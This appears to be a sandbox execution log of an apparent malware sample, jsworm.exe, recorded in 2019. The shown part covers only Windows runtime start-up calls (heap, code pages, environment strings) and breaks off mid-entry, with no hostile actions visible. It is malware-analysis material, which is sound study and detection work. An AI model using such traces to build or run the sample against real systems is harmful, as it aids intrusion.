# Flog Txt Version 1 # Analyzer Version: 3.0.2 # Analyzer Build Date: Jul 9 2019 16:03:52 # Log Creation Date: 18.07.2019 07:39:42.814 Process: id = "1" image_name = "jsworm.exe" filename = "c:\\users\\fd1hvy\\desktop\\jsworm.exe" page_root = "0x117d1000" os_pid = "0xb08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\FD1HVy\\Desktop\\jsworm.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xd54 [0039.670] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0039.670] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x74ea0000 [0039.671] GetProcAddress (hModule=0x74ea0000, lpProcName="InitializeCriticalSectionEx") returned 0x74f97060 [0039.671] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x74ea0000 [0039.671] GetProcAddress (hModule=0x74ea0000, lpProcName="FlsAlloc") returned 0x74f9bea0 [0039.671] GetProcAddress (hModule=0x74ea0000, lpProcName="FlsSetValue") returned 0x74f92550 [0039.671] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x74ea0000 [0039.672] GetProcAddress (hModule=0x74ea0000, lpProcName="InitializeCriticalSectionEx") returned 0x74f97060 [0039.672] GetProcessHeap () returned 0x1e0000 [0039.672] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x74ea0000 [0039.672] GetProcAddress (hModule=0x74ea0000, lpProcName="FlsAlloc") returned 0x74f9bea0 [0039.672] GetLastError () returned 0xcb [0039.672] GetProcAddress (hModule=0x74ea0000, lpProcName="FlsGetValue") returned 0x74f870c0 [0039.672] GetProcAddress (hModule=0x74ea0000, lpProcName="FlsSetValue") returned 0x74f92550 [0039.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x364) returned 0x1fe350 [0039.672] SetLastError (dwErrCode=0xcb) [0039.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0xe00) returned 0x1ffad0 [0039.679] GetStartupInfoW (in: lpStartupInfo=0xbcfaf4 | out: lpStartupInfo=0xbcfaf4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\jsworm.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0039.679] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0039.679] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0039.679] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0039.679] GetCommandLineA () returned="\"C:\\Users\\FD1HVy\\Desktop\\jsworm.exe\" " [0039.680] GetCommandLineW () returned="\"C:\\Users\\FD1HVy\\Desktop\\jsworm.exe\" " [0039.680] GetACP () returned 0x4e4 [0039.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x220) returned 0x1f2698 [0039.680] IsValidCodePage (CodePage=0x4e4) returned 1 [0039.680] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xbcfb14 | out: lpCPInfo=0xbcfb14) returned 1 [0039.680] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xbcf3dc | out: lpCPInfo=0xbcf3dc) returned 1 [0039.680] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xbcf9f0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0039.680] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xbcf9f0, cbMultiByte=256, lpWideCharStr=0xbcf178, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0039.680] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0xbcf3f0 | out: lpCharType=0xbcf3f0) returned 1 [0039.680] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xbcf9f0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0039.680] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xbcf9f0, cbMultiByte=256, lpWideCharStr=0xbcf138, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0039.680] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x74ea0000 [0039.680] GetProcAddress (hModule=0x74ea0000, lpProcName="LCMapStringEx") returned 0x74f7ed00 [0039.680] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0039.680] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0xbcef28, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0039.680] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0xbcf8f0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x95\xce\x8d\xfd\x2c\xfb\xbc", lpUsedDefaultChar=0x0) returned 256 [0039.680] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xbcf9f0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0039.680] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xbcf9f0, cbMultiByte=256, lpWideCharStr=0xbcf148, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0039.680] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0039.680] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0xbcef38, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0039.680] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0xbcf7f0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x95\xce\x8d\xfd\x2c\xfb\xbc", lpUsedDefaultChar=0x0) returned 256 [0039.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x1eeb70 [0039.680] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xbcf938, nSize=0x105 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\jsworm.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\jsworm.exe")) returned 0x22 [0039.680] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x75e90000 [0039.681] GetProcAddress (hModule=0x75e90000, lpProcName="AreFileApisANSI") returned 0x75ea4280 [0039.681] AreFileApisANSI () returned 1 [0039.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy\\Desktop\\jsworm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0039.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy\\Desktop\\jsworm.exe", cchWideChar=-1, lpMultiByteStr=0x1343040, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\FD1HVy\\Desktop\\jsworm.exe", lpUsedDefaultChar=0x0) returned 35 [0039.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x2b) returned 0x1f81d8 [0039.691] RtlInitializeSListHead (in: ListHead=0x1342ce0 | out: ListHead=0x1342ce0) [0039.691] GetLastError () returned 0x0 [0039.691] SetLastError (dwErrCode=0x0) [0039.691] GetEnvironmentStringsW () returned 0x2008d8* [0039.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0039.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x565) returned 0x1fec40 [0039.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x1fec40, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0039.691] FreeEnvironmentStringsW (penv=0x2008d8) returned 1 [0039.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x94) returned 0x1ee090 [0039.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x1f) returned 0x1fc2b8 [0039.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x28) returned 0x1f5d68 [0039.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x37) returned 0x1f8e80 [0039.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x3c) returned 0x1f24e8 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x31) returned 0x1f8fc0 [0039.692] 